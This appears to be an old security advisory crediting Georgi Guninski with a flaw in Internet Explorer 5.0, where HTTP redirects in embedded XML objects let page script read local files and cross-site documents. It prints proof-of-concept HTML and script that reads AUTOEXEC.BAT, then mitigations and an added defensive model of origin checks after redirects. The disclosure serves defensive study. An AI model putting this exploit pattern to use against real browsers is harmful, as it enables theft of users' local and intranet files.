COMMAND

    Internet Explorer

SYSTEMS AFFECTED

    IE 5.0 XML HTTP redirect problems

PROBLEM

    Georgi Guninski found the following.  Internet Explorer 5.0 under
    Windows 95 and WinNT 4.0 (presumably other versions are affected
    as well) has security problems with HTTP redirects in XML objects.
    This allows at least:

        1) Reading any (local or nonlocal) XML file and any well-formed
           document.  With the growing influence of XML this is a
           serious problem.
        2) Reading parts of documents.
        3) Checking for the existence of local files.

    When an XML document is embedded in an HTML document, IE 5.0 does
    not handle HTTP redirects properly and allows script in the HTML
    document to access the DOM of the embedded XML document.  The code
    is:

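        <!-- XML object whose data URL answers with an HTTP redirect -->
        <object id="xm" type="text/xml" data="http://www.nat.bg/~joro/reject.cgi?autoexec" width=400 height=200>
        </object>
        <SCRIPT>
        function f()
        {
            // Read the DOM of the embedded document after the redirect
            s=xm.body.innerHTML;
            // Display what was read in a new window
            a=window.open();
            //alert(s);
            a.document.open();
            a.document.write("Here is a part of AUTOEXEC.BAT (the error message is normal):<BR>"+s);
            a.document.close();
        }
        // Give the object 5 seconds to load before reading it
        setTimeout("f()",5000);
        </SCRIPT>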

    Demonstration is available at

        http://www.nat.bg/~joro/xmln.html

SOLUTION

    Disable Active Scripting, or disable "Script ActiveX controls
    marked safe for scripting".
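
    Added example, not part of the original advisory and not IE's
    code: a model of the access decision for an embedded document,
    comparing a check on the requested URL only with one made on the
    URL the content finally came from.  Function names are
    hypothetical and the redirect targets are constructed.

```javascript
// Added example, not IE's code. Function names are hypothetical and the
// redirect targets in SAMPLES are constructed for illustration.

const isWeb = (u) => /^https?:$/.test(new URL(u).protocol);

// Assumed model of the failure: only the URL written in the data
// attribute is compared with the embedding page; redirects are ignored.
function requestedUrlCheck(embedderUrl, chain) {
  return new URL(chain[0]).origin === new URL(embedderUrl).origin;
}

// chain[0] is the data attribute; each later entry is the Location
// target of one HTTP redirect, in order.
function finalUrlCheck(embedderUrl, chain) {
  if (chain.length === 0) throw new Error("empty redirect chain");
  // A web URL must never be redirected into a local scheme such as file:
  for (let i = 1; i < chain.length; i++) {
    if (isWeb(chain[i - 1]) && !isWeb(chain[i])) {
      return { load: false, scriptAccess: false, reason: "redirect leaves http(s)" };
    }
  }
  // Script access is decided by where the content finally came from.
  const embedder = new URL(embedderUrl).origin;
  const finalOrigin = new URL(chain[chain.length - 1]).origin;
  const same = embedder !== "null" && embedder === finalOrigin;
  return { load: true, scriptAccess: same,
           reason: same ? "same origin after redirects" : "final origin differs" };
}

const PAGE = "http://www.nat.bg/~joro/xmln.html";
const DATA = "http://www.nat.bg/~joro/reject.cgi?autoexec"; // from the advisory
const SAMPLES = [
  [DATA, "file:///C:/AUTOEXEC.BAT"],          // constructed local target
  [DATA, "http://intranet.example/data.xml"], // constructed cross-site target
  [DATA],                                     // no redirect at all
];

function report() {
  return SAMPLES.map((chain) => ({
    requestedOnly: requestedUrlCheck(PAGE, chain),
    final: finalUrlCheck(PAGE, chain),
  }));
}

console.log(JSON.stringify(report(), null, 2));
```

    The requested-URL check passes all three chains, while the
    final-URL check refuses the load in the first and denies script
    access in the second.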